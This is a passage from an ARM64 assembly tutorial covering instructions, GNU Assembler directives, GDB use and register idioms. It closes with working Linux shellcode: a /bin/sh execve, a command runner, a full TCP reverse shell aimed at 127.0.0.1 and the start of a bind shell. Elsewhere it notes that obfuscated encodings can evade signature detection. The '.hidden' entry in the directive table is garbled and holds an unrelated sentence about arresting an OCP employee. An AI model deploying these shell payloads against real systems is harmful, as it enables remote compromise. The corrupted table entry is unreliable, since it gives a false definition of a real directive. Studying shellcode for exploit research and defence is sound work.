    // Extract 8-bits from x1 and insert with zeros into the x0 register at position 8.
    // If x1 is 0x12345678, 0x00005600 is placed in x0.
    ubfiz   x0, x1, 8, 8
    
    // Extract 8-bits from x1 and insert into x0 at position 0.
    // if x1 is 0x12345678 and x0 is 0x09ABCDEF. x0 after execution has 0x09ABCD78
    bfxil   x0, x1, 0, 8
    
    // Clear lower 8 bits.
    bfxil   x0, xzr, 0, 8

    // Zero-extend 8-bits
    uxtb    x0, x0

2.6 Branch

Branch instructions change the flow of execution using the condition flags or value of a general-purpose register. Branches are referred to as “jumps” in x86 assembly.

Mnemonic Operands Instruction
B label Branch causes an unconditional branch to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
B.cond label Branch conditionally to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
BL label Branch with Link branches to a PC-relative offset, setting the register X30 to PC+4. It provides a hint that this is a subroutine call.
BLR Xn Branch with Link to Register calls a subroutine at an address in a register, setting register X30 to PC+4.
BR Xn Branch to Register branches unconditionally to an address in a register, with a hint that this is not a subroutine return.
CBNZ Rn, label Compare and Branch on Nonzero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect the condition flags.
CBZ Rn, label Compare and Branch on Zero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
RET Xn Return from subroutine branches unconditionally to an address in a register, with a hint that this is a subroutine return.
TBNZ Rn, #imm, label Test bit and Branch if Nonzero compares the value of a bit in a general-purpose register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
TBZ Rn, #imm, label Test bit and Branch if Zero compares the value of a test bit with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.

Testing for TRUE or FALSE after calling a subroutine is so common, that it makes perfect sense to have conditional branch instructions such as TBZ/TBNZ and CBZ/CBNZ. The only instruction that comes close to these on x86 would be JCXZ that jumps if the value of the CX register is zero. However, x86 subroutines normally return results in the accumulator (AX) and the counter register (CX) is normally used for iterations/loops.

2.7 System

The main system instruction for shellcodes is the supervisor call SVC

Mnemonic Instruction
MSR Move general-purpose register to System Register allows the PE to write an AArch64 System register from a
general-purpose register.
MRS Move System Register allows the PE to read an AArch64 System register into a general-purpose register.
SVC Supervisor Call causes an exception to be taken to EL1.
NOP No Operation does nothing, other than advance the value of the program counter by 4. This instruction can be used
for instruction alignment purposes.

There’s a special-purpose register that allows you to read and write to the conditional flags called NZCV.

  // read the condition flags
  .equ OVERFLOW_FLAG, 1 << 28
  .equ CARRY_FLAG,    1 << 29
  .equ ZERO_FLAG,     1 << 30
  .equ NEGATIVE_FLAG, 1 << 31

  mrs    x0, nzcv

  // set the C flag
  mov    w0, CARRY_FLAG
  msr    nzcv, x0

2.8 x86 and A64 comparison

The following table lists x86 instructions and their equivalent for A64. It’s not a comprehensive list by any means. It’s mainly the more common instructions you’ll likely use or see in disassembled code. In some cases, x86 does not have an equivalent instruction and is therefore not included.

x86 Mnemonic A64 Mnemonic Instruction
MOVZX UXT Zero-Extend.
MOVSX SXT Sign-Extend.
BSWAP REV Reverse byte order.
SHR LSR Logical Shift Right.
SHL LSL Logical Shift Left.
XOR EOR Bitwise exclusive-OR.
OR ORR Bitwise OR.
NOT MVN Bitwise NOT.
SHRD EXTR Double precision shift right / Extract register from pair of registers.
SAR ASR Arithmetic Shift Right.
SBB SBC Subtract with Borrow / Subtract with Carry
TEST TST Perform a bitwise AND, set flags and discard result.
CALL BL Branch with Link / Call a subroutine.
JNE BNE Jump/Branch if Not Equal.
JS BMI Jump/Branch if Signed / Minus.
JG BGT Jump/Branch if Greater.
JGE BGE Jump/Branch if Greater or Equal.
JE BEQ Jump/Branch if Equal.
JC/JB BCS / BHS Jump/Branch if Carry / Borrow
JNC/JNB BCC / BLO Jump/Branch if No Carry / No Borrow
JAE BPL Jump if Above or Equal / Branch if Plus, positive or Zero.

3. GNU Assembler

The GNU toolchain includes the compiler collection (gcc), debugger (gdb), the C library (glibc), an assembler (gas) and linker (ld). The GNU Assembler (GAS) supports many architectures, so if you’re just starting to write ARM assembly, I cannot currently recommend a better assembler for Linux. Having said that, readers may wish to experiment with other products.

3.1 Preprocessor Directives

The following directives are what I personally found the most useful when writing assembly code with GAS.

Directive Instruction
.arch name Specifies the target architecture. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target architecture. Examples include: armv8-aarmv8.1-aarmv8.2-aarmv8.3-aarmv8.4-a. Equivalent to the -march option in GCC.
.cpu name Specifies the target processor. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target processor. Examples include: cortex-a53cortex-a76. Equivalent to the -mcpu option in GCC.
.include “file” Include assembly code from “file”.
.macro namearguments Allows you to define macros that generate assembly output.
.if .if marks the beginning of a section of code which is only considered part of the source program being assembled if the argument (which must be an absolute expression) is non-zero. The end of the conditional section of code must be marked by .endif
.global Tells the assembler the function is publicly accessible.
.equ symbol, expression Equate. Define a symbolic constant. Equivalent to the define directive in C.
.set symbol, expression Set the value of symbol to expression.If symbol was flagged as external, it remains flagged. Similar to the equate directive (.EQU) except the value can be changed later.
name .req register name This creates an alias for register name called name. For example: A .req x0
.size Tells the assembler how much space a function or object is using. If a function is unused, the linker can exclude it.
.struct expression Switch to the absolute section, and set the section offset to expression, which must be an absolute expression.
.skip size, fill This directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.space’.
.space size, fill TThis directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.skip’.
.text subsection Tells as to assemble the following statements onto the end of the text subsection numbered subsection, which is an absolute expression. If subsection is omitted, subsection number zero is used.
.data subsection .data tells as to assemble the following statements onto the end of the data subsection numbered subsection (which is an absolute expression). If subsection is omitted, it defaults to zero.
.bss Section for uninitialized data.
.align abs-expr , abs-expr , abs-expr Pad the location counter (in the current subsection) to a particular storage boundary. The first expression (which must be absolute) is the alignment required, as described below. The second expression (also absolute) gives the fill value to be stored in the padding bytes. It (and the comma) may be omitted. If it is omitted, the padding bytes are normally zero. However, on some systems, if the section is marked as containing code and the fill value is omitted, the space is filled with no-op instructions. The third expression is also absolute, and is also optional. If it is present, it is the maximum number of bytes that should be skipped by this alignment directive. If doing the alignment would require skipping more bytes than the specified maximum, then the alignment is not done at all. You can omit the fill value (the second argument) entirely by simply using two commas after the required alignment; this can be useful if you want the alignment to be filled with no-op instructions when appropriate.
.ascii “string” .ascii expects zero or more string literals separated by commas. It assembles each string (with no automatic trailing zero byte) into consecutive addresses.
.hidden Any attempt to arrest a senior OCP employee results in shutdown.
.asciz “string” .asciz is just like .ascii, but each string is followed by a zero byte. The “z” in ‘.asciz’ stands for “zero”.
.string str.string8 str.string16 str The variants string16, string32 and string64 differ from the string pseudo opcode in that each 8-bit character from str is copied and expanded to 16, 32 or 64 bits respectively. The expanded characters are stored in target endianness byte order.
.byte Declares a variable of 8-bits.
.hword/.2byte Declares a variable of 16-bits. The second ensures only 16-bits.
.word/.4byte Declares a variable of 32-bits. The second ensures only 32-bits.
.quad/.8byte Declares a variable of 64-bits. The second ensures only 64-bits.

3.2 GCC Assembly

GCC can be incredibly useful when first starting to learn any assembly language because it provides an option to generate assembly output from source code using the -S option. If you want to generate assembly with source code, compile with -g and -c options, then dump with objdump -d -S. Most people want their applications optimized for speed rather than size, so it stands to reason the GNU C optimizer is not terribly efficient at generating compact code. Our new A.I overlords might be able to change all that, but at least for now, a human wins at writing compact assembly code.

Just to illustrate using an example. Here’s a subroutine that does nothing useful.

#include <stdio.h>

void calc(int a, int b) {
    int i;
    
    for(i=0;i<4;i++) {
      printf("%i\n", ((a * i) + b) % 5);
    }
}

Compile this code using -Os option to optimize for size. The following assembly is gnerated by GCC. Recall that x30 is the link register and saved here because of the call to printf. We also have to use callee saved registers x19-x22 for storing variables because x0-x18 are trashed by the call to printf.

	.arch armv8-a
	.file	"calc.c"
	.text
	.align	2
	.global	calc
	.type	calc, %function
calc:
	stp	x29, x30, [sp, -64]!    // store x29, x30 (LR) on stack
	add	x29, sp, 0              // x29 = sp
	stp	x21, x22, [sp, 32]      // store x21, x22 on stack
	adrp	x21, .LC0               // x21 = "%i\n" 
	stp	x19, x20, [sp, 16]      // store x19, x20 on stack
	mov	w22, w0                 // w22 = a
	mov	w19, w1                 // w19 = b
	add	x21, x21, :lo12:.LC0    // x21 = x21 + 0
	str	x23, [sp, 48]           // store x23 on stack
	mov	w20, 4                  // i = 4
	mov	w23, 5                  // divisor = 5 for modulus
.L2:
	sdiv	w1, w19, w23            // w1 = b / 5
	mov	x0, x21                 // x0 = "%i\n"
	add	w1, w1, w1, lsl 2       // w1 *= 5
	sub	w1, w19, w1             // w1 = b - ((b / 5) * 5)
	add	w19, w19, w22           // b += a
	bl	printf

	subs	w20, w20, #1            // i = i - 1
	bne	.L2                     // while (i != 0)

	ldp	x19, x20, [sp, 16]      // restore x19, x20
	ldp	x21, x22, [sp, 32]      // restore x21, x22
	ldr	x23, [sp, 48]           // restore x23
	ldp	x29, x30, [sp], 64      // restore x29, x30 (LR)
	ret                             // return to caller

	.size	calc, .-calc
	.section	.rodata.str1.1,"aMS",@progbits,1
.LC0:
	.string	"%i\n"
	.ident	"GCC: (Debian 6.3.0-18) 6.3.0 20170516"
	.section	.note.GNU-stack,"",@progbits

i is initialized to 4 instead of 0 and decreased rather than increased. There’s no modulus instruction in the A64 set, and division instructions don’t produce a remainder, so the calculation is performed using a combination of division, multiplication and subtraction. The modulo operation is calculated with the following : R = N - ((N / D) * D)

N denotes the numerator/dividend, D denotes the divisor and R denotes the remainder. The following assembly code is how it might be written by hand. The most notable change is using the msub instruction in place of a separate add and sub.

        .arch armv8-a
	.text
	.align 2
	.global calc

calc:
        stp   x19, x20, [sp, -48]!
        stp   x21, x22, [sp, 16]
        stp   x23, x30, [sp, 32]

	mov   w19, w0           // w19 = a
	mov   w20, w1           // w20 = b
        mov   w21, 4            // i = 4 
	mov   w22, 5            // set divisor
.LC2:
	sdiv  w1, w20, w22      // w1 = b - ((b / 5) * 5) 
	msub  w1, w1, w22, w20  // 
	adr   x0, .LC0          // x0 = "%i\n"
	bl    printf

        add   w20, w20, w19     // b += a	
	subs  w21, w21, 1       // i = i - 1
	bne   .LC2              // 

        ldp   x19, x20, [sp], 16
	ldp   x21, x22, [sp], 16
        ldp   x23, x30, [sp], 16
	ret
.LC0:
	.string "%i\n"

Use compiler generated assembly as a guide, but try to improve upon the code as shown in the above example.

3.3 Symbolic Constants

What if we want to use symbolic constants from C header files in our assembler code? There are two options.

  1. Convert each symbolic constant to its GAS equivalent using the .EQU or .SETdirectives. Very time consuming.
  2. Use C-style #include directive and pre-process using GNU CPP. Quicker with several advantages.

Obviously the second option is less painful and less likely to produce errors. Of course, I’m not discounting the possibility of automating the first option, but why bother? CPP has an option that will do it for us. Let’s see what the manual says.

Instead of the normal output, -dM will generate a list of #define directives for all the macros defined during the execution of the preprocessor, including predefined macros. This gives you a way of finding out what is predefined in your version of the preprocessor.

So, -dM will dump all the #define macros and -E will preprocess a file, but not compile, assemble or link. So, the steps to using symbolic names in our assembler code are:

  1. Use cpp -dM to dump all the #defined keywords from each include header.
  2. Use sort and uniq -u to remove duplicates.
  3. Use the #include directive in our assembly source code.
  4. Use cpp -E to preprocess and pipe the output to a new assembly file. (-o is an output option)
  5. Assemble using as to generate an object file.
  6. Link the object file to generate an executable.

The following is some simple code that displays Hello, World! to the console.

#include "include.h"

        .global _start
        .text

_start:
        mov    x8, __NR_write
        mov    x2, hello_len
        adr    x1, hello_txt
        mov    x0, STDOUT_FILENO
        svc    0

        mov    x8, __NR_exit
        svc    0

        .data

hello_txt: .ascii "Hello, World!\n"
hello_len = . - hello_txt

Preprocess the above source using CPP -E. The result of this will be replacing each symbolic constant used with its assigned numeric value.

Finally, assemble using GAS and link with LD.

The following two directives are examples of simple text substitution or symbolic constants.

  #define FALSE 0
  #define TRUE  1

The equivalent can be accomplished with the .EQU or .SET directives in GAS.

  .equ TRUE, 1
  .set TRUE, 1
  
  .equ FALSE, 0
  .set FALSE, 0

Personally, I think it makes more sense to use the C preprocessor, but it’s entirely up to yourself.

3.4 Structures and Unions

A structure in programming is incredibly useful for combining different data types into a single user-defined data type. One of the major pitfalls in programming any assembly is poorly managed memory access. In my own experience, MASM always had the best support for data structures. NASM and YASM could be much better. Unfortunately support for structures in GAS isn’t great. Understandably, many of the hand-written assembly programs for Linux normally use global variables that are placed in the .datasection of a source file. For a Position Independent Code (PIC) or thread-safe application that can only use local variables allocated on the stack, a data structure helps as a reference to manage those variables. Assigning names helps clarify what each stack address is for, and improves overall quality. It’s also much easier to modify code by simply re-arranging the elements of a structure later.

Take for example the following C structure dimension_t that requires conversion to GAS assembly syntax.

typedef struct _dimension_t {
  int x, y;
} dimension_t;

The closest directive to the struct keyword is .struct. Unfortunately this directive doesn’t accept a name and nor does it allow members to be enclosed between .struct and .ends that some of you might be familiar with in YASM/NASM. This directive only accepts an offsetas a start position.

        .struct 0
dimension_t.x:
        .struct dimension_t.x + 4
dimension_t.y:
        .struct dimension_t.y + 4
dimension_t_size:

An alternate way of defining the above structure can be done with the .skip or .spacedirectives.

        .struct 0
dimension_t.x: .skip 4
dimension_t.y: .skip 4
dimension_t_size:

If we have to manually define the size of each field in the structure, it seems the .structdirective is of little use. Consider using the #define keyword and preprocessing the file before assembling.

#define dimension_t.x 0
#define dimension_t.y 4
#define dimension_t.size 8

For a union, it doesn’t get any better than what I suggest be used for structures. We can use the .set or .equ directives or refer back to a combination of using #define and cpp. Support for both unions and structures in GAS leaves a lot to be desired.

3.5 Operators

From time to time I’ll see some mention of “polymorphic” shellcodes where the author attempts to hide or obfuscate strings using simple arithmetic or bitwise operations. Usually the obfuscation is done via a bit rotation or exclusive-OR and this presumably helps evade detection by some security products.

Operators are arithmetic functions, like + or %. Prefix operators take one argument. Infix operators take two arguments, one on either side. Operators have precedence, but operations with equal precedence are performed left to right.

Precedence Operators
Highest Mutiplication (*), Division (/), Remainder (%), Shift Left (<<), Right Shift (>>).
Intermediate Bitwise inclusive-OR (|), Bitwise And (&), Bitwise Exclusive-OR (^), Bitwise Or Not (!).
Low Addition (+), Subtraction (-), Equal To (==), Not Equal To (!=), Less Than (<), Greater Than (>), Greater Than Or Equal To (>=), Less than Or Equal To (<=).
Lowest Logical And (&&). Logical Or (||).

The following examples show a number of ways to use operators prior to assembly. These examples just load the immediate value 0x12345678 into the w0 register.

   // exclusive-OR
    movz    w0, 0x5678 ^ 0x4823
    movk    w0, 0x1234 ^ 0x5412
    movz    w1, 0x4823
    movk    w1, 0x5412, lsl 16
    eor     w0, w0, w1

    // rotate a value left by 5 bits using MOVZ/MOVK
    movz    w0,  (0x12345678 << 5)        |  (0x12345678 >> (32-5)) & 0xFFFF
    movk    w0, ((0x12345678 << 5) >> 16) | ((0x12345678 >> (32-5)) >> 16) & 0xFFFF, lsl 16
    // then rotate right by 5 to obtain original value
    ror     w0, w0, 5

    // right rotate using LDR
    .equ    ROT, 5

    ldr     w0, =(0x12345678 << ROT) | (0x12345678 >> (32 - ROT)) & 0xFFFFFFFF
    ror     w0, w0, ROT

    // bitwise NOT
    ldr     w0, =~0x12345678
    mvn     w0, w0

    // negation
    ldr     w0, =-0x12345678
    neg     w0, w0
    

3.6 Macros

If we need to repeat a number of assembly instructions, but with different parameters, using macros can be helpful. For example, you might want to eliminate branches in a loop to make code faster. Let’s say you want to load a 32-bit immediate value into a register. ARM instruction encodings are all 32-bits, so it isn’t possible to load anything more than a 16-bit immediate. Some immediate values can be stored in the literal pool and loaded using LDR, but if we use just MOV instructions, here’s how to load the 32-bit number 0x12345678 into register w0.

  movz    w0, 0x5678
  movk    w0, 0x1234, lsl 16

The first instruction MOVZ loads 0x5678 into w0, zero extending to 32-bits. MOVK loads 0x1234 into the upper 16-bits using a shift, while preserving the lower 16-bits. Some assemblers provide a pseudo-instruction called MOVL that expands into the two instructions above. However, the GNU Assembler doesn’t recognize it, so here are two macros for GAS that can load a 32-bit or 64-bit immediate value into a general purpose register.

  // load a 64-bit immediate using MOV
  .macro movq Xn, imm
      movz    \Xn,  \imm & 0xFFFF
      movk    \Xn, (\imm >> 16) & 0xFFFF, lsl 16
      movk    \Xn, (\imm >> 32) & 0xFFFF, lsl 32
      movk    \Xn, (\imm >> 48) & 0xFFFF, lsl 48
  .endm

  // load a 32-bit immediate using MOV
  .macro movl Wn, imm
      movz    \Wn,  \imm & 0xFFFF
      movk    \Wn, (\imm >> 16) & 0xFFFF, lsl 16
  .endm

Then if we need to load a 32-bit immediate value, we do the following.

  movl    w0, 0x12345678

Here are two more that imitate the PUSH and POP instructions. Of course, this only supports a single register, so you might want to write your own.

  // imitate a push operation
  .macro push Rn:req
      str     \Rn, [sp, -16]
  .endm

  // imitate a pop operation
  .macro pop Rn:req
      ldr     \Rn, [sp], 16
  .endm

3.7 Conditional assembly

Like the GNU C compiler, GAS provides support for if-else preprocessor directives. The following shows an example in C.

    #ifdef BIND
      // compile code to bind
    #else
      // compile code to connect
    #endif

Next, an example for GAS.

   .ifdef BIND
      // assemble code to bind
    .else
      // assemble code for connect
    .endif

GAS also supports something similar to the #ifndef directive in C.

    .ifnotdef BIND
      // assemble code for connect
    .else
      // assemble code for bind
    .endif

3.8 Comments

These are ignored by the assembler. Intended to provide an explanation for what code does. C style comments /* */ or C++ style // are a good choice. Ampersand (@) and hash (#) are also valid, however, you should know that when using the preprocessor on an assembly source code, comments that start with the hash symbol can be problematic. I tend to use C++ style for single line comments and C style for comment blocks.

  # This is a comment

  // This is a comment

  /*
    This is a comment
  */

  @ This is a comment.

4. GNU Debugger

Sometimes it’s necessary to closely monitor the execution of code to find the location of a bug. This is normally accomplished via breakpoints and single-stepping through each instruction.

4.1 Layout

There are various front ends for GDB that are intended to enhance debugging. Personally I don’t use GDB enough to be familiar with any of them. The setup I have is simply a split layout that shows disassembly and registers. This has worked well enough for what I need writing these simple codes, but you may want to experiment with the front ends. The following screenshot is what a split layout looks like.

To setup a split layout, save the following to $HOME/.gdbinit

layout split
layout regs

4.2 Commands

The following are a number of commands I’ve found useful for writing code.

Command Description
stepi Step into instruction.
nexti Step over instruction. (skips calls to subroutines)
set follow-fork-mode child Debug child process.
set follow-fork-mode parent Debug parent process.
layout split Display the source, assembly, and command windows.
layout regs Display registers window.
break <address> Set a breakpoint on address.
refresh Refresh the screen layout.
tty [device] Specifies the terminal device to be used for the debugged process.
continue Continue with execution.
run Run program from start.
define Combine commands into single user-defined command.

During execution of code, the window may become unstable. One way around this is to use the ‘refresh’ command, however, that probably only corrects it once. You can use the ‘define’ command to combine multiple commands into one macro.

(gdb) define stepx
Type commands for definition of "stepx".
End with a line saying just "end".
>stepi
>refresh
>end
(gdb) 

This works, but it’s not ideal. The screen will still bump. The best workaround I could find is to create a new terminal window. Obtain the TTY and use this in GDB. e.g. tty /dev/pts/1

5. Common Operations

Initializing or checking the contents of a register are very common operations in any assembly language. Knowing multiple ways to perform these actions can potentially help evade signature detection tools. What I show here isn’t an extensive list of ways by any means because there are umpteen ways to perform any operation, it just depends on how many instructions you wish to use.

5.1 Saving Registers

We can freely use 19 registers without having to preserve them for the caller. Compare this with x86 where only 3 registers are available or 5 for AMD64. One minor annoyance with ARM is calling subroutines. Unlike INTEL CPUs, ARM doesn’t store a return address on the stack. It stores the return address in the Link Register (LR) which is an alias for the x30 register. A callee is expected to save LR/x30 if it calls a subroutine. Not doing so will cause problems. If you migrate from ARM32, you’ll miss the convenience of push and popto save registers. These instructions have been deprecated in favour of load and store instructions, so we need to use STR/STP to save and LDR/LDP to restore. Here’s how you can save/restore registers using the stack.

    // push {x0}
    // [base - 16] = x0
    // base = base - 16
    str    x0, [sp, -16]!

    // pop {x0}
    // x0 = [base]
    // base = base + 16
    ldr    x0, [sp], 16

    // push {x0, x1}
    stp    x0, x1, [sp, -16]!

    // pop {x0, x1}
    ldp    x0, x1, [sp], 16

You might be wondering why 16 is used to store one register. The stack must always be aligned by 16 bytes. Unaligned access can cause exceptions.

5.2 Copying Registers

The first example here is the “normal” way and the rest are a few alternatives.

    // Move x1 to x0
    mov     x0, x1

    // Extract bits 0-63 from x1 and store in x0 zero extended.
    ubfx   x0, x1, 0, 63

    // x0 = (x1 & ~0)
    bic    x0, x1, xzr

    // x0 = x1 >> 0
    lsr    x0, x1, 0

    // Use a circular shift (rotate) to move x1 to x0
    ror    x0, x1, 0
    
    // Extract bits 0-63 from x1 and insert into x0
    bfxil  x0, x1, 0, 63

5.3 Initialize register to zero.

Normally to initialize a counter “i = 0” or pass NULL/0 to a system call. Each one of these instructions will do that.

    // Move an immediate value of zero into the register.
    mov    x0, 0

    // Copy the zero register.
    mov    x0, xzr

    // Exclusive-OR the register with itself.
    eor    x0, x0, x0

    // Subtract the register from itself.
    sub    x0, x0, x0

    // Mask the register with zero register using a bitwise AND.
    // An immediate value of zero will work here too.
    and    x0, x0, xzr

    // Multiply the register by the zero register.
    mul    x0, x0, xzr

    // Extract 64 bits from xzr and place in x0.
    bfxil  x0, xzr, 0, 63
    
    // Circular shift (rotate) right.
    ror    x0, xzr, 0

    // Logical shift right.
    lsr    x0, xzr, 0
    
    // Reverse bytes of zero register.
    rev    x0, xzr

5.4 Initialize register to 1.

Rarely does a counter start at 1, but it’s common enough passing to a system call.

    // Move 1 into x0.
    mov     x0, 1

    // Compare x0 with x0 and set x0 if equal.
    cmp     x0, x0
    cset    x0, eq

    // Bitwise NOT the zero register and store in x0. Negate x0.
    mvn     x0, xzr
    neg     x0, x0

5.5 Initialize register to -1.

Some system calls require this value.

    // move -1 into register
    mov     x0, -1

    // copy the zero register inverted
    mvn     x0, xzr

    // x0 = ~(x0 ^ x0)
    eon     x0, x0, x0

    // x0 = (x0 | ~xzr)
    orn     x0, x0, xzr

    // x0 = (int)0xFF
    mov     w0, 255
    sxtb    x0, w0

    // x0 = (x0 == x0) ? -1 : x0
    cmp     x0, x0
    csetm   x0, eq

5.6 Initialize register to 0x80000000.

This might seem vague now, but an algorithm like X25519 uses this value for its reduction step.

    mov     w0, 0x80000000

    // Set bit 31 of w0.
    mov     w0, 1
    mov     w0, w0, lsl 31

    // Set bit 31 of w0.
    mov     w0, 1
    ror     w0, w0, 1

    // Set bit 31 of w0.
    mov     w0, 1
    rbit    w0, w0

    // Set bit 31 of w0.
    eon     w0, w0, w0
    lsr     w0, w0, 1
    add     w0, w0, 1
    
    // Set bit 31 of w0.
    mov     w0, -1
    extr    w0, w0, wzr, 1

5.7 Testing for 1/TRUE.

A function returning TRUE normally indicates success, so these are some ways to test for that.

    // Compare x0 with 1, branch if equal.
    cmp     x0, 1
    beq     true

    // Compare x0 with zero register, branch if not equal.
    cmp     x0, xzr
    bne     true
    
    // Subtract 1 from x0 and set flags. Branch if equal. (Z flag is set)
    subs    x0, x0, 1
    beq     true

    // Negate x0 and set flags. Branch if x0 is negative.
    negs    x0, x0
    bmi     true

    // Conditional branch if x0 is not zero.
    cbnz    x0, true

    // Test bit 0 and branch if not zero.
    tbnz    x0, 0, true

5.8 Testing for 0/FALSE.

Normally we see a CMP instruction used in handwritten assembly code to evaluate this condition. This subtracts the source register from the destination register, sets the flags, and discards the result.

    // x0 == 0
    cmp     x0, 0
    beq     false

    // x0 == 0
    cmp     x0, xzr
    beq     false

    ands    x0, x0, x0
    beq     false

    // same as ANDS, but discards result
    tst     x0, x0
    beq     false

    // x0 == -0
    negs    x0
    beq     false

    // (x0 - 1) == -1
    subs    x0, x0, 1
    bmi     false

    // if (!x0) goto false
    cbz     x0, false

    // if (!x0) goto false
    tbz     x0, 0, false

5.9 Testing for -1

Some functions will return a negative number like -1 to indicate failure. CMN is used in the first example. This behaves exactly like CMP, except it is adding the source value (register or immediate) to the destination register, setting the flags and discarding the result.

    // w0 == -1
    cmn     w0, 1
    beq     failed

    // w0 == 0
    cmn     w0, wzr
    bmi     failed

    // negative?
    ands    w0, w0, w0
    bmi     failed

    // same as AND, but discards result
    tst     w0, w0
    bmi     failed

    // w0 & 0x80000000
    tbz     w0, 31, failed

6. Linux Shellcode

Developing an operating system, writing boot code, reverse engineering or exploiting vulnerabilities; these are all valid reasons to learn assembly language. In the case of exploiting bugs, one needs to have a grasp of writing shellcodes. These are compact position independent codes that use system calls to interact with the operating system.

6.1 System Calls

System calls are a bridge between the user and kernel space running at a higher privileged level. Each call has its own unique number that is essentially an index into an array of function pointers located in the kernel. Whether you want to write to a file on disk, send and receive data over the network or just print a message to the screen, all of this must be performed via system calls at some point.

A full list of calls can be found in the Linux source tree on github here, but if you’re already logged into a Linux system running on ARM64, you might find a list in /usr/include/asm-generic/unistd.h too. Here are a few to save you time looking up.

  // Linux/AArch64 system calls
  .equ SYS_epoll_create1,   20
  .equ SYS_epoll_ctl,       21
  .equ SYS_epoll_pwait,     22
  .equ SYS_dup3,            24
  .equ SYS_fcntl,           25
  .equ SYS_statfs,          43
  .equ SYS_faccessat,       48
  .equ SYS_chroot,          51
  .equ SYS_fchmodat,        53
  .equ SYS_openat,          56
  .equ SYS_close,           57
  .equ SYS_pipe2,           59
  .equ SYS_read,            63
  .equ SYS_write,           64
  .equ SYS_pselect6,        72
  .equ SYS_ppoll,           73
  .equ SYS_splice,          76
  .equ SYS_exit,            93
  .equ SYS_futex,           98
  .equ SYS_kill,           129
  .equ SYS_reboot,         142
  .equ SYS_setuid,         146
  .equ SYS_setsid,         157
  .equ SYS_uname,          160
  .equ SYS_getpid,         172
  .equ SYS_getppid,        173
  .equ SYS_getuid,         174
  .equ SYS_getgid,         176
  .equ SYS_gettid,         178
  .equ SYS_socket,         198
  .equ SYS_bind,           200
  .equ SYS_listen,         201
  .equ SYS_accept,         202
  .equ SYS_connect,        203
  .equ SYS_sendto,         206
  .equ SYS_recvfrom,       207
  .equ SYS_setsockopt,     208
  .equ SYS_getsockopt,     209
  .equ SYS_shutdown,       210
  .equ SYS_munmap,         215
  .equ SYS_clone,          220
  .equ SYS_execve,         221
  .equ SYS_mmap,           222
  .equ SYS_mprotect,       226
  .equ SYS_wait4,          260
  .equ SYS_getrandom,      278
  .equ SYS_memfd_create,   279
  .equ SYS_access,        1033

All registers except those required to return values are preserved. System calls return results in x0 while everything else remains the same, including the conditional flags. In the shellcode, only immediate values and stack are used for strings. This is the approach I recommend because it allows manipulation of the string before it’s stored on the stack. Using LDR and the literal pool is a good alternative.

6.2 Tracing

“strace” is a diagnostic and debugging utility for Linux can show problems in your code. It will show what system calls are implemented by the kernel and which ones are simply wrapper functions in GLIBC. As I found out while writing some of the shellcodes, there is no dup2pipe, or fork system calls. There are only wrapper functions in GLIBC that call dup3pipe2 and clone.

6.3 Executing a shell.

// 40 bytes

    .arch armv8-a

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", NULL, NULL);
    mov    x8, SYS_execve
    mov    x2, xzr           // NULL
    mov    x1, xzr           // NULL
    movq   x3, BINSH         // "/bin/sh"
    str    x3, [sp, -16]!    // stores string on stack
    mov    x0, sp
    svc    0

6.4 Executing a command.

Executing a command can be a good replacement for a reverse connecting or bind shell because if a system can execute netcat, ncat, wget, curl, GET then executing a command may be sufficient to compromise a system further. The following just echos “Hello, World!” to the console.

// 64 bytes

    .arch armv8-a
    .align 4

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    movq   x0, BINSH             // x0 = "/bin/sh\0"
    str    x0, [sp, -64]!
    mov    x0, sp
    mov    x1, 0x632D            // x1 = "-c"
    str    x1, [sp, 16]
    add    x1, sp, 16
    adr    x2, cmd               // x2 = cmd
    stp    x0, x1,  [sp, 32]     // store "-c", "/bin/sh"
    stp    x2, xzr, [sp, 48]     // store cmd, NULL
    mov    x2, xzr               // penv = NULL
    add    x1, sp, 32            // x1 = argv
    mov    x8, SYS_execve
    svc    0
cmd:
    .asciz "echo Hello, World!"

6.5 Reverse connecting shell over TCP.

The reverse shell makes an outgoing connection to a remote host and upon connection will spawn a shell that accepts input. Rather than use PC-relative instructions, the network address structure is initialized using immediate values.

// 120 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F // 127.0.0.1

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // connect(s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    mov     x2, 16
    movq    x1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp     // x1 = &sa 
    svc     0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     x2, xzr
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.6 Bind shell over TCP.

Pretty much the same as the reverse shell except we listen for incoming connections using three separate system calls. bindlistenaccept are used in place of connect. This could easily be updated to include connect using the conditional assembly discussed before.

// 148 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234

    .global _start
